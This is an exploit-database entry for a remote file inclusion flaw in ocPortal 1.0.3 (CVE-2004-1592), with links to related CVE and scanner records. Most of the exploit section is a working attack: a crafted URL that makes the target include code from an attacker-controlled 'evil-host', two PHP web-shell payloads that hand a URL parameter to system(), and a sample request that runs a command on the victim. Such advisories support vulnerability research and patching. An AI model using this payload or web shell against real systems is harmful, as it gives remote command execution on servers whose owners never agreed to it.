Lucene search
ExoduksEDB-ID:574HistoryOct 13, 2004 - 12:00 a.m.
ocPortal 1.0.3 - Remote File Inclusion
2004-10-1300:00:00
Exoduks
www.exploit-db.com
83
AI Score
7.4
Confidence
Low
http://localhost/ocp-103/index.php?req_path=http ://evil-host/
On your evil host you must put scipt funcs.php.
Example of funcs.php if your host doesn't support php.
<?php
$com = $_GET["com"];
system ("$com");
?>
Example of funcs.php if your host support php.
<?php
echo '<?php $com = $_GET["com"]; system ("$com"); ?>';
?>
http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls
# milw0rm.com [2004-10-13]Related
cvelist
cvelist
CVE-2004-1592
2005-02-20 05:00:00
nessus
nessus
ocPortal index.php req_path Parameter Remote File Inclusion
2004-10-13 00:00:00
cve
cve
CVE-2004-1592
2005-02-20 05:00:00
nvd
nvd
CVE-2004-1592
2004-12-31 05:00:00